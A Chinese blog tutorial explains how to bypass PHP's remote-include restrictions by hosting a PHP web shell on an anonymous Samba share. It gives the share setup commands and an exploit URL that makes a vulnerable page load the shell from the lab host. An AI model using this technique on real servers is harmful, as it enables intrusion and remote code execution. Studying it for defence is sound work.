• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    使用SMB共享来绕过php远程文件包含的限制执行RFI的利用

    在这篇博文中,我将为大家演示如何利用PHP应用中的远程文件包含漏洞的技术。我们将绕过php远程文件包含的限制,并执行RFI的利用,即使PHP环境被配置为不包含来自远程HTTP/FTP URL的文件。

    PHP 和 SMB 共享文件访问

    在PHP配置文件中,“allow_url_include”wrapper默认设置为“Off”,指示PHP不加载远程HTTP或FTP URL,从而防止远程文件包含攻击。但是,即使“allow_url_include”和“allow_url_fopen”都设置为“Off”,PHP也不会阻止加载SMB URL。而这就极有可能被滥用来从SMB共享加载远程托管的PHP Web shell。

    攻击场景概述

    当易受攻击的PHP应用程序代码尝试从受攻击者控制的SMB共享加载PHP Web shell时,SMB共享应允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的SMB服务器。因此,一旦易受攻击的应用程序尝试从SMB共享访问PHP Web shell,SMB服务器将不会要求任何的凭据,易受攻击的应用程序将包含Web shell的PHP代码。

    首先,我重新配置了PHP环境,并在php.in i文件中禁用了“allow-url-fopen”和“allow-url-include”。之后,配置了具有匿名浏览访问的SMB服务器。一旦SMB共享准备就绪,我们就可以利用易受攻击的应用程序了。

    PHP 环境设置

    将托管易受攻击代码的机器上的“allow_url_fopen”和“allow_url_include”设置为“Off”

    以下是版本为“5.5.11”的PHP当前配置截图:

     

    在继续下一步之前,让我们确保当我们尝试访问HTTP上托管的Web shell时,PHP代码不允许远程文件包含。

     

    可以看到,当我试图从远程主机包含PHP Web shell时,应用程序抛出错误并且没有包含远程文件。

    使用匿名浏览访问配置 Samba 服务器(Linux 机器)
    使用以下命令安装Samba服务器:

    apt-get install samba创建SMB共享目录:

    mkdir /var/www/html/pub/

     

    配置新创建的SMB共享目录的权限:

    chmod 0555 /var/www/html/pub/
    chown -R nobody:nogroup /var/www/html/pub/

     

    运行以下命令,删除SAMBA服务器配置文件的默认内容。

    echo > /etc/samba/smb.conf将以下内容添加到/etc/samba/smb.conf文件。

    [global]
    workgroup = WORKGROUP
    server string = Samba Server %v
    netbios name = indishell-lab
    security = user
    map to guest = bad user
    name resolve order = bcast host
    dns proxy = no
    bind interfaces only = yes
    [ica]
    path = /var/www/html/pub
    writable = no
    guest ok = yes
    guest only = yes
    read only = yes
    directory mode = 0555

    force user = nobody现在,重启SAMBA服务器以使配置文件/etc/samba/smb.conf中的新配置生效。

    service smbd restart成功重启SAMBA服务器后,尝试访问SMB共享并确保SAMBA服务器不要求提供凭据。

    在本例中,SAMBA服务器IP为192.168.0.3,我需要访问Windows文件浏览器中的SMB共享,如下:

    \\192.168.0.3\&;

     

    在 SMB 共享中托管 PHP Web shell

    太棒了!可以访问smb共享,并显示目录“ica”存在。

     

    现在,将PHP shell托管在目录“/var/www/html/pub”中,该目录为smb共享目录“ica”。

    成功托管PHP shell后,我们使用Windows文件浏览器访问SMB共享目录“ica”。

    \\192.168.0.3\ica\可以看到php shell存在于smb共享目录中,在本例中为box.php文件。

     

    利用文件包含易受攻击的参数
    让我们使用这个PHP shell SMB链接,以及易受攻击的php代码浏览它。

    http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.phpPHP易受攻击的代码从SMB共享中获取了web shell,并在应用程序服务器上执行了代码\m/。我们已经绕过了php远程文件包含的限制,并包含了托管在远程主机上的Web shell。

     

    总结

    以上所述是小编给大家介绍的使用SMB共享来绕过php远程文件包含的限制执行RFI的利用,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对脚本之家网站的支持!

    您可能感兴趣的文章:
    • php文件包含目录配置open_basedir的使用与性能详解
    • PHP中你应该知道的require()文件包含的正确用法
    • php 伪造本地文件包含漏洞的代码
    • PHP 网络开发详解之远程文件包含漏洞
    • php文件包含的几种方式总结
    上一篇:PHP使用ActiveMQ实现消息队列的方法详解
    下一篇:PHP工厂模式、单例模式与注册树模式实例详解
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    使用SMB共享来绕过php远程文件包含的限制执行RFI的利用 使用,SMB,共享,来,绕过,php,